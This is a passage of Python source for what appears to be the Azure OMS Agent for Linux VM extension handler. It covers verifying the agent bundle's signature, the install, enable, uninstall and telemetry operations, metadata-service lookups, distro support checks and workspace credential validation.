PackagesDirectory = 'packages'
keysDirectory = 'keys'
# Below file version will be replaced during OMS-Build time.
BundleFileName = 'omsagent-0.0.0-0.universal.x64.sh'
GUIDRegex = r'[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
GUIDOnlyRegex = r'^' + GUIDRegex + '$'
SCOMCertIssuerRegex = r'^[\s]*Issuer:[\s]*CN=SCX-Certificate/title=SCX' + GUIDRegex + ', DC=.*$'
SCOMPort = 1270
PostOnboardingSleepSeconds = 5
InitialRetrySleepSeconds = 30
IsUpgrade = False
# Paths
OMSAdminPath = '/opt/microsoft/omsagent/bin/omsadmin.sh'
OMSAgentServiceScript = '/opt/microsoft/omsagent/bin/service_control'
OMIConfigEditorPath = '/opt/omi/bin/omiconfigeditor'
OMIServerConfPath = '/etc/opt/omi/conf/omiserver.conf'
EtcOMSAgentPath = '/etc/opt/microsoft/omsagent/'
VarOMSAgentPath = '/var/opt/microsoft/omsagent/'
SCOMCertPath = '/etc/opt/microsoft/scx/ssl/scx.pem'
ExtensionStateSubdirectory = 'state'
# Commands
# Always use upgrade - will handle install if scx, omi are not installed or upgrade if they are.
InstallCommandTemplate = '{0} --upgrade'
UninstallCommandTemplate = '{0} --remove'
WorkspaceCheckCommand = '{0} -l'.format(OMSAdminPath)
OnboardCommandWithOptionalParams = '{0} -w {1} -s {2} {3}'
RestartOMSAgentServiceCommand = '{0} restart'.format(OMSAgentServiceScript)
DisableOMSAgentServiceCommand = '{0} disable'.format(OMSAgentServiceScript)
# Cloud Environments
PublicCloudName = "AzurePublicCloud"
FairfaxCloudName = "AzureUSGovernmentCloud"
MooncakeCloudName = "AzureChinaCloud"
USNatCloudName = "USNat" # EX
USSecCloudName = "USSec" # RX
DefaultCloudName = PublicCloudName # Fallback
CloudDomainMap = {
PublicCloudName: "opinsights.azure.com",
FairfaxCloudName: "opinsights.azure.us",
MooncakeCloudName: "opinsights.azure.cn",
USNatCloudName: "opinsights.azure.eaglex.ic.gov",
USSecCloudName: "opinsights.azure.microsoft.scloud"
}
# Error codes
DPKGLockedErrorCode = 55 #56, temporary as it excludes from SLA
InstallErrorCurlNotInstalled = 55 #64, temporary as it excludes from SLA
EnableErrorOMSReturned403 = 5
EnableErrorOMSReturnedNon200 = 6
EnableErrorResolvingHost = 7
EnableErrorOnboarding = 8
EnableCalledBeforeSuccessfulInstall = 52 # since install is a missing dependency
UnsupportedOpenSSL = 55 #60, temporary as it excludes from SLA
# OneClick error codes
OneClickErrorCode = 40
ManagedIdentityExtMissingErrorCode = 41
ManagedIdentityExtErrorCode = 42
MetadataAPIErrorCode = 43
OMSServiceOneClickErrorCode = 44
MissingorInvalidParameterErrorCode = 11
UnwantedMultipleConnectionsErrorCode = 10
CannotConnectToOMSErrorCode = 55
UnsupportedOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# OneClick Constants
ManagedIdentityExtListeningURLPath = '/var/lib/waagent/ManagedIdentity-Settings'
GUIDRegex = '[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
OAuthTokenResource = 'https://management.core.windows.net/'
OMSServiceValidationEndpoint = 'https://global.oms.opinsights.azure.com/ManagedIdentityService.svc/Validate'
AutoManagedWorkspaceCreationSleepSeconds = 20
# agent permissions
AgentUser='omsagent'
AgentGroup='omiusers'
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
os.system('chmod {1} {0}'.format(ext_log_path, 700))
except:
pass
"""
What need to be packaged to make the signing work:
keys
dscgpgkey.asc
msgpgkey.asc
packages
omsagent-*.universal.x64.asc
omsagent-*.universal.x64.sha256sums
"""
def verifyShellBundleSigningAndChecksum():
cert_directory = os.path.join(os.getcwd(), PackagesDirectory)
keys_directory = os.path.join(os.getcwd(), keysDirectory)
# import GPG key
dscGPGKeyFilePath = os.path.join(keys_directory, 'dscgpgkey.asc')
if not os.path.isfile(dscGPGKeyFilePath):
raise Exception("Unable to find the dscgpgkey.asc file at " + dscGPGKeyFilePath)
importGPGKeyCommand = "sh ImportGPGkey.sh " + dscGPGKeyFilePath
exit_code, output = run_command_with_retries_output(importGPGKeyCommand, retries = 0, retry_check = retry_skip, check_error = False)
# Check that we can find the keyring file
keyringFilePath = os.path.join(keys_directory, 'keyring.gpg')
if not os.path.isfile(keyringFilePath):
raise Exception("Unable to find the Extension keyring file at " + keyringFilePath)
# Check that we can find the asc file
bundleFileName, file_ext = os.path.splitext(BundleFileName)
ascFilePath = os.path.join(cert_directory, bundleFileName + ".asc")
if not os.path.isfile(ascFilePath):
raise Exception("Unable to find the OMS shell bundle asc file at " + ascFilePath)
# check that we can find the SHA256 sums file
sha256SumsFilePath = os.path.join(cert_directory, bundleFileName + ".sha256sums")
if not os.path.isfile(sha256SumsFilePath):
raise Exception("Unable to find the OMS shell bundle SHA256 sums file at " + sha256SumsFilePath)
# Verify the SHA256 sums file with the keyring and asc files
verifySha256SumsCommand = "HOME=" + keysDirectory + " gpg --no-default-keyring --keyring " + keyringFilePath + " --verify " + ascFilePath + " " + sha256SumsFilePath
exit_code, output = run_command_with_retries_output(verifySha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
if exit_code != 0:
raise Exception("Failed to verify SHA256 sums file at " + sha256SumsFilePath)
# Perform SHA256 sums to verify shell bundle
hutil_log_info("Perform SHA256 sums to verify shell bundle")
performSha256SumsCommand = "cd %s; sha256sum -c %s" % (cert_directory, sha256SumsFilePath)
exit_code, output = run_command_with_retries_output(performSha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
if exit_code != 0:
raise Exception("Failed to verify shell bundle with the SHA256 sums file at " + sha256SumsFilePath)
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('OmsAgentForLinux started to handle.')
global IsUpgrade
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
IsUpgrade = True
elif re.match('^([-/]*)(telemetry)', option):
operation = 'Telemetry'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
# Clean status file to mitigate diskspace issues on small VMs
status_files = [
"/var/opt/microsoft/omsconfig/status/dscperformconsistency",
"/var/opt/microsoft/omsconfig/status/dscperforminventory",
"/var/opt/microsoft/omsconfig/status/dscsetlcm",
"/var/opt/microsoft/omsconfig/status/omsconfighost"
]
for sf in status_files:
if os.path.isfile(sf):
if sf.startswith("/var/opt/microsoft/omsconfig/status"):
try:
os.remove(sf)
except Exception as e:
hutil_log_info('Error removing telemetry status file before installation: {0}'.format(sf))
hutil_log_info('Exception info: {0}'.format(traceback.format_exc()))
exit_code = check_disk_space_availability()
if exit_code is not 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
# Verify shell bundle signing
try:
hutil_log_info("Start signing verification")
verifyShellBundleSigningAndChecksum()
hutil_log_info("ShellBundle signing verification succeeded")
except Exception as ex:
errmsg = "ShellBundle signing verification failed with '%s'" % ex.message
if ProceedOnSigningVerificationFailure:
hutil_log_error(errmsg)
else:
log_and_exit(operation, errmsg)
# invoke operation
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
if exit_code is 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.EnterpriseCloud.' \
'Monitoring.OmsAgentForLinux'
elif exit_code is 127 and operation == 'Install':
# happens if shell bundle couldn't be extracted due to low space or missing dependency
exit_code = 52 # since it is a missing dependency
message = 'Install failed with exit code 127. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.EnterpriseCloud.' \
'Monitoring.OmsAgentForLinux'
elif exit_code is DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
elif exit_code is not 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except OmsAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 or get_free_space_mb("/opt") < 500:
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
def stop_telemetry_process():
pids_filepath = os.path.join(os.getcwd(),'omstelemetry.pid')
# kill existing telemetry watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to omsagent.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("omsagent.py") >= 0 and cmdline[0].find("-telemetry") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
def start_telemetry_process():
"""
Start telemetry process that performs periodic monitoring activities
:return: None
"""
stop_telemetry_process()
#start telemetry watcher
omsagent_filepath = os.path.join(os.getcwd(),'omsagent.py')
args = ['python{0}'.format(sys.version_info[0]), omsagent_filepath, '-telemetry']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def telemetry():
pids_filepath = os.path.join(os.getcwd(), 'omstelemetry.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
if HUtilObject is not None:
watcher = watcherutil.Watcher(HUtilObject.error, HUtilObject.log)
watcher_thread = Thread(target = watcher.watch)
self_mon_thread = Thread(target = watcher.monitor_health)
watcher_thread.start()
self_mon_thread.start()
watcher_thread.join()
self_mon_thread.join()
return 0, ""
def prepare_update():
"""
Copy / move configuration directory to the backup
"""
# First check if backup directory was previously created for given workspace.
# If it is created with all the files , we need not move the files again.
public_settings, _ = get_settings()
workspaceId = public_settings.get('workspaceId')
etc_remove_path = os.path.join(EtcOMSAgentPath, workspaceId)
etc_move_path = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
if (not os.path.isdir(etc_move_path)):
shutil.move(etc_remove_path, etc_move_path)
return 0, ""
def restore_state(workspaceId):
"""
Copy / move state from backup to the expected location.
"""
try:
etc_backup_path = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
if (os.path.isdir(etc_backup_path) and not os.path.isdir(etc_final_path)):
shutil.move(etc_backup_path, etc_final_path)
except Exception as e:
hutil_log_error("Error while restoring the state. Exception : "+traceback.format_exc())
def install():
"""
Ensure that this VM distro and version are supported.
Install the OMSAgent shell bundle, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
exit_if_vm_not_supported('Install')
public_settings, protected_settings = get_settings()
if public_settings is None:
raise ParameterMissingException('Public configuration must be ' \
'provided')
workspaceId = public_settings.get('workspaceId')
check_workspace_id(workspaceId)
# Take the backup of the state for given workspace.
restore_state(workspaceId)
# In the case where a SCOM connection is already present, we should not
# create conflicts by installing the OMSAgent packages
stopOnMultipleConnections = public_settings.get('stopOnMultipleConnections')
if (stopOnMultipleConnections is not None
and stopOnMultipleConnections is True):
detect_multiple_connections(workspaceId)
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
os.chmod(bundle_path, 100)
cmd = InstallCommandTemplate.format(bundle_path)
hutil_log_info('Running command "{0}"'.format(cmd))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(cmd, retries = 15,
retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
final_check = final_check_if_dpkg_locked)
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the OMSAgent shell bundle.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
global IsUpgrade
os.chmod(bundle_path, 100)
cmd = UninstallCommandTemplate.format(bundle_path)
hutil_log_info('Running command "{0}"'.format(cmd))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(cmd, retries = 5,
retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
final_check = final_check_if_dpkg_locked)
except Exception as e:
# try to force clean the installation
try:
check_kill_process("omsagent")
exit_code = 0
except Exception as ex:
exit_code = 1
message = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
if IsUpgrade:
IsUpgrade = False
else:
remove_workspace_configuration()
return exit_code, output
def enable():
"""
Onboard the OMSAgent to the specified OMS workspace.
This includes enabling the OMS process on the VM.
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
if HUtilObject is not None:
if HUtilObject.is_seq_smaller():
log_output = "Current sequence number {0} is not greater than the sequence number of the most recent executed configuration, skipping enable.".format(HUtilObject._context._seq_no)
hutil_log_info(log_output)
return 0, log_output
exit_if_vm_not_supported('Enable')
public_settings, protected_settings = get_settings()
if public_settings is None:
raise ParameterMissingException('Public configuration must be ' \
'provided')
if protected_settings is None:
raise ParameterMissingException('Private configuration must be ' \
'provided')
vmResourceId = protected_settings.get('vmResourceId')
# If vmResourceId is not provided in private settings, get it from metadata API
if vmResourceId is None or not vmResourceId:
vmResourceId = get_vmresourceid_from_metadata()
hutil_log_info('vmResourceId from Metadata API is {0}'.format(vmResourceId))
if vmResourceId is None:
hutil_log_info('This may be a classic VM')
enableAutomaticManagement = public_settings.get('enableAutomaticManagement')
if (enableAutomaticManagement is not None
and enableAutomaticManagement is True):
hutil_log_info('enableAutomaticManagement is set to true; the ' \
'workspace ID and key will be determined by the OMS ' \
'service.')
workspaceInfo = retrieve_managed_workspace(vmResourceId)
if (workspaceInfo is None or 'WorkspaceId' not in workspaceInfo
or 'WorkspaceKey' not in workspaceInfo):
raise OneClickException('Workspace info was not determined')
else:
# Note: do NOT log workspace keys!
hutil_log_info('Managed workspaceInfo has been retrieved')
workspaceId = workspaceInfo['WorkspaceId']
workspaceKey = workspaceInfo['WorkspaceKey']
try:
check_workspace_id_and_key(workspaceId, workspaceKey)
except InvalidParameterError as e:
raise OMSServiceOneClickException('Received invalid ' \
'workspace info: ' \
'{0}'.format(e))
else:
workspaceId = public_settings.get('workspaceId')
workspaceKey = protected_settings.get('workspaceKey')
check_workspace_id_and_key(workspaceId, workspaceKey)
# Check if omsadmin script is available
if not os.path.exists(OMSAdminPath):
log_and_exit('Enable', EnableCalledBeforeSuccessfulInstall,
'OMSAgent onboarding script {0} does not exist. Enable ' \
'cannot be called before install.'.format(OMSAdminPath))
vmResourceIdParam = '-a {0}'.format(vmResourceId)
proxy = protected_settings.get('proxy')
proxyParam = ''
if proxy is not None:
proxyParam = '-p {0}'.format(proxy)
# get domain from protected settings
domain = protected_settings.get('domain')
if domain is None:
# detect opinsights domain using IMDS
domain = get_azure_cloud_domain()
else:
hutil_log_info("Domain retrieved from protected settings '{0}'".format(domain))
domainParam = ''
if domain:
domainParam = '-d {0}'.format(domain)
optionalParams = '{0} {1} {2}'.format(domainParam, proxyParam, vmResourceIdParam)
onboard_cmd = OnboardCommandWithOptionalParams.format(OMSAdminPath,
workspaceId,
workspaceKey,
optionalParams)
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_with_retries_output(onboard_cmd, retries = 5,
retry_check = retry_onboarding,
final_check = raise_if_no_internet,
check_error = True, log_cmd = False)
# now ensure the permissions and ownership is set recursively
try:
workspaceId = public_settings.get('workspaceId')
etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
if (os.path.isdir(etc_final_path)):
uid = pwd.getpwnam(AgentUser).pw_uid
gid = grp.getgrnam(AgentGroup).gr_gid
os.chown(etc_final_path, uid, gid)
os.system('chmod {1} {0}'.format(etc_final_path, 750))
for root, dirs, files in os.walk(etc_final_path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
os.system('chmod {1} {0}'.format(os.path.join(root, d), 750))
for f in files:
os.chown(os.path.join(root, f), uid, gid)
os.system('chmod {1} {0}'.format(os.path.join(root, f), 640))
except:
hutil_log_info('Failed to set permissions for OMS directories, could potentially have issues uploading.')
if exit_code is 0:
# Create a marker file to denote the workspace that was
# onboarded using the extension. This will allow supporting
# multi-homing through the extension like Windows does
extension_marker_path = os.path.join(EtcOMSAgentPath, workspaceId,
'conf/.azure_extension_marker')
if os.path.exists(extension_marker_path):
hutil_log_info('Extension marker file {0} already ' \
'created'.format(extension_marker_path))
else:
try:
open(extension_marker_path, 'w').close()
hutil_log_info('Created extension marker file ' \
'{0}'.format(extension_marker_path))
except IOError as e:
try:
open(extension_marker_path, 'w+').close()
hutil_log_info('Created extension marker file ' \
'{0}'.format(extension_marker_path))
except IOError as ex:
hutil_log_error('Error creating {0} with error: ' \
'{1}'.format(extension_marker_path, ex))
# we are having some kind of permissions issue creating the marker file
output = "Couldn't create marker file"
exit_code = 52 # since it is a missing dependency
# Sleep to prevent bombarding the processes, then restart all processes
# to resolve any issues with auto-started processes from --upgrade
time.sleep(PostOnboardingSleepSeconds)
run_command_and_log(RestartOMSAgentServiceCommand)
#start telemetry process if enable is successful
start_telemetry_process()
#save sequence number
HUtilObject.save_seq()
return exit_code, output
def remove_workspace_configuration():
"""
This is needed to distinguish between extension removal vs extension upgrade.
Its a workaround for waagent upgrade routine calling 'remove' on an old version
before calling 'upgrade' on new extension version issue.
In upgrade case, we need workspace configuration to persist when in
remove case we need all the files be removed.
This method will remove all the files/folders from the workspace path in Etc and Var.
"""
public_settings, _ = get_settings()
workspaceId = public_settings.get('workspaceId')
etc_remove_path = os.path.join(EtcOMSAgentPath, workspaceId)
var_remove_path = os.path.join(VarOMSAgentPath, workspaceId)
shutil.rmtree(etc_remove_path, True)
shutil.rmtree(var_remove_path, True)
hutil_log_info('Moved oms etc configuration directory and cleaned up var directory')
def is_arc_installed():
"""
Check if the system is on an Arc machine
"""
# Using systemctl to check this since Arc only supports VMs that have systemd
check_arc = os.system('systemctl status himdsd 1>/dev/null 2>&1')
return check_arc == 0
def get_arc_endpoint():
"""
Find the endpoint for Arc Hybrid IMDS
"""
endpoint_filepath = '/lib/systemd/system.conf.d/azcmagent.conf'
endpoint = ''
try:
with open(endpoint_filepath, 'r') as f:
data = f.read()
endpoint = data.split("\"IMDS_ENDPOINT=")[1].split("\"\n")[0]
except:
hutil_log_error('Unable to load Arc IMDS endpoint from {0}'.format(endpoint_filepath))
return endpoint
def get_imds_endpoint():
"""
Find the endpoint for IMDS, whether Arc or not
"""
azure_imds_endpoint = 'http://169.254.169.254/metadata/instance?api-version=2018-10-01'
if (is_arc_installed()):
hutil_log_info('Arc is installed, loading Arc-specific IMDS endpoint')
imds_endpoint = get_arc_endpoint()
if imds_endpoint:
imds_endpoint += '/metadata/instance?api-version=2019-08-15'
else:
# Fall back to the traditional IMDS endpoint; the cloud domain and VM
# resource id detection logic are resilient to failed queries to IMDS
imds_endpoint = azure_imds_endpoint
hutil_log_info('Falling back to default Azure IMDS endpoint')
else:
imds_endpoint = azure_imds_endpoint
hutil_log_info('Using IMDS endpoint "{0}"'.format(imds_endpoint))
return imds_endpoint
def get_vmresourceid_from_metadata():
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' not in response or response['compute'] is None):
return None # classic vm
if response['compute']['vmScaleSetName']:
return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachineScaleSets/{2}/virtualMachines/{3}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['vmScaleSetName'],response['compute']['name'])
else:
return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachines/{2}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['name'])
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from Metadata service: ' \
'{0}'.format(e.read()))
return None
except:
hutil_log_error('Unexpected error from Metadata service')
return None
def get_azure_environment_from_imds():
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' not in response or response['compute'] is None):
return None # classic vm
if ('azEnvironment' not in response['compute'] or response['compute']['azEnvironment'] is None):
return None # classic vm
return response['compute']['azEnvironment']
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from Metadata service: ' \
'{0}'.format(e.read()))
return None
except:
hutil_log_error('Unexpected error from Metadata service')
return None
def get_azure_cloud_domain():
try:
environment = get_azure_environment_from_imds()
if environment:
for cloud, domain in CloudDomainMap.items():
if environment.lower() == cloud.lower():
hutil_log_info('Detected cloud environment "{0}" via IMDS. The domain "{1}" will be used.'.format(cloud, domain))
return domain
hutil_log_info('Unknown cloud environment "{0}"'.format(environment))
except Exception as e:
hutil_log_error('Failed to detect cloud environment: {0}'.format(e))
hutil_log_info('Falling back to default domain "{0}"'.format(CloudDomainMap[DefaultCloudName]))
return CloudDomainMap[DefaultCloudName]
def retrieve_managed_workspace(vm_resource_id):
"""
EnableAutomaticManagement has been set to true; the
ManagedIdentity extension and the VM Resource ID are also
required for the OneClick scenario
Using these and the Metadata API, we will call the OMS service
to determine what workspace ID and key to onboard to
"""
# Check for OneClick scenario requirements:
if not os.path.exists(ManagedIdentityExtListeningURLPath):
raise ManagedIdentityExtMissingException
# Determine the Tenant ID using the Metadata API
tenant_id = get_tenant_id_from_metadata_api(vm_resource_id)
# Retrieve an OAuth token using the ManagedIdentity extension
if tenant_id is not None:
hutil_log_info('Tenant ID from Metadata API is {0}'.format(tenant_id))
access_token = get_access_token(tenant_id, OAuthTokenResource)
else:
return None
# Query OMS service for the workspace info for onboarding
if tenant_id is not None and access_token is not None:
return get_workspace_info_from_oms(vm_resource_id, tenant_id,
access_token)
else:
return None
def disable():
"""
Disable all OMS workspace processes on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
#stop the telemetry process
stop_telemetry_process()
# Check if the service control script is available
if not os.path.exists(OMSAgentServiceScript):
log_and_exit('Disable', 1, 'OMSAgent service control script {0} does' \
'not exist. Disable cannot be called ' \
'before install.'.format(OMSAgentServiceScript))
return 1
exit_code, output = run_command_and_log(DisableOMSAgentServiceCommand)
return exit_code, output
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
# For update call we will only prepare the update by taking some backup of the state
# since omsagent.py->install() will be called
# everytime upgrade is done due to upgradeMode =
# "UpgradeWithInstall" set in HandlerManifest
'Update' : prepare_update,
'Telemetry' : telemetry
}
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
if (operation == 'Telemetry'):
logFileName = 'watcher.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def is_vm_supported_for_extension():
"""
Checks if the VM this extension is running on is supported by OMSAgent
Returns for platform.linux_distribution() vary widely in format, such as
'7.3.1611' returned for a VM with CentOS 7, so the first provided
digits must match
The supported distros of the OMSAgent-for-Linux are allowed to utilize
this VM extension. All other distros will get error code 51
"""
supported_dists = {'redhat' : ['6', '7', '8'], 'red hat' : ['6', '7', '8'], 'rhel' : ['6', '7', '8'], # Red Hat
'centos' : ['6', '7', '8'], # CentOS
'oracle' : ['6', '7', '8'], 'ol': ['6', '7', '8'], # Oracle
'debian' : ['8', '9'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12', '15'], 'sles' : ['12', '15'], # SLES
'amzn' : ['2'] # AWS
}
vm_dist, vm_ver, vm_supported = '', '', False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
# Fallback if either of the above fail; on some (especially newer)
# distros, linux_distribution() and dist() are unreliable or deprecated
if not vm_dist and not vm_ver:
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
return vm_supported, 'Indeterminate operating system', ''
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
if vm_ver_num is not supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the OMSAgent.
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension()
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def exit_if_openssl_unavailable(operation):
"""
Check if the openssl commandline interface is available to use
If not, throw error to return UnsupportedOpenSSL error code
"""
exit_code, output = run_get_output('which openssl', True, False)
if exit_code is not 0:
log_and_exit(operation, UnsupportedOpenSSL, 'OpenSSL is not available')
return 0
def check_workspace_id_and_key(workspace_id, workspace_key):
"""
Validate formats of workspace_id and workspace_key
"""
check_workspace_id(workspace_id)
# Validate that workspace_key is of the correct format (base64-encoded)
if workspace_key is None:
raise ParameterMissingException('Workspace key must be provided')
try:
encoded_key = base64.b64encode(base64.b64decode(workspace_key))
if sys.version_info >= (3,): # in python 3, base64.b64encode will return bytes, so decode to str for comparison
encoded_key = encoded_key.decode()
if encoded_key != workspace_key:
raise InvalidParameterError('Workspace key is invalid')
except TypeError:
raise InvalidParameterError('Workspace key is invalid')
def check_workspace_id(workspace_id):
"""
Validate that workspace_id matches the GUID regex
"""
if workspace_id is None:
raise ParameterMissingException('Workspace ID must be provided')
search = re.compile(GUIDOnlyRegex, re.M)
if not search.match(workspace_id):
raise InvalidParameterError('Workspace ID is invalid')
def detect_multiple_connections(workspace_id):
"""
If the VM already has a workspace/SCOM configured, then we should
disallow a new connection when stopOnMultipleConnections is used
Throw an exception in these cases:
- The workspace with the given workspace_id has not been onboarded
to the VM, but at least one other workspace has been
- The workspace with the given workspace_id has not been onboarded
to the VM, and the VM is connected to SCOM
If the extension operation is connecting to an already-configured
workspace, it is not a stopping case
"""
other_connection_exists = False
if os.path.exists(OMSAdminPath):
exit_code, utfoutput = run_get_output(WorkspaceCheckCommand,
chk_err = False)
# output may contain unicode characters not supported by ascii
# for e.g., generates the following error if used without conversion: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 18: ordinal not in range(128)
# default encoding in python is ascii in python < 3
if sys.version_info < (3,):
output = utfoutput.decode('utf8').encode('utf8')
else:
output = utfoutput
if output.strip().lower() != 'no workspace':
for line in output.split('\n'):
if workspace_id in line:
hutil_log_info('The workspace to be enabled has already ' \
'been configured on the VM before; ' \
'continuing despite ' \
'stopOnMultipleConnections flag')
return
else:
# Note: if scom workspace dir is created, a line containing
